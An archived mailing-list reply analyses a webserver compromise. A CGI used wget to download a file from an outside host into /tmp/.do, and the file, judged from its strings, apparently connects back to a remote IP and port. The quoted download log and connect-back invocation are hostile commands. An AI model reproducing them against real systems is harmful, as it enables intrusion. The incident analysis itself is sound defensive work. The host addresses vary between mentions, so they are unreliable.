[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[suse-security] Re: Backdoor over http(s)??
On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:
> I have found in /var/log/httpd/error.log
> --09:06:43-- http://22.214.171.124/manual/.x/rhs
> => `/tmp/.do'
Some CGI at your webserver did run wget to receive some file from
126.96.36.199 and save it on your disc as "/tmp/.do".
wwwrun:nogroup are standard user and group used for apache.
The file is still avaiable from http://188.8.131.52/manual/.x/rhs
I don't want to execute it, but strings does list some information:
usage: %s <IP or hostname> <port>
(/tmp/.do 184.108.40.206 9090)
> connect error
probably a error message printed by /tmp/.do.
The server at 220.127.116.11 identifies itself as Apache/1.3.9 (Old!)
Stefan Tichy <listuser@xxxxxxxxx>
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here